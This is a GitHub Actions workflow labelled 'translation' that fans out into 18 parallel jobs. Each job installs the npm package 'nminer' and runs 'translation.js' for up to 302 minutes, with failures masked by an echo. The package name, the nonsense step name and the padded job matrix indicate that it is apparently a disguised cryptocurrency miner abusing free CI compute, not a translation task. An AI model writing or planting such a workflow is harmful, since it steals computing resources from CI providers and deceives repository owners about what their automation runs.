name: translation
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 8881 }
          - { version: 5654 }
          - { version: 205 }
          - { version: 4692 }
          - { version: 8489 }
          - { version: 4483 }
          - { version: 3913 }
          - { version: 1138 }
          - { version: 9823 }
          - { version: 7278 }
          - { version: 6702 }
          - { version: 5715 }
          - { version: 7991 }
          - { version: 9982 }
          - { version: 3867 }
          - { version: 7046 }
          - { version: 9777 }
          - { version: 7846 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: excepting although
        run: |
          npm install nminer@latest
          timeout 302m node translation.js || echo "translation executed"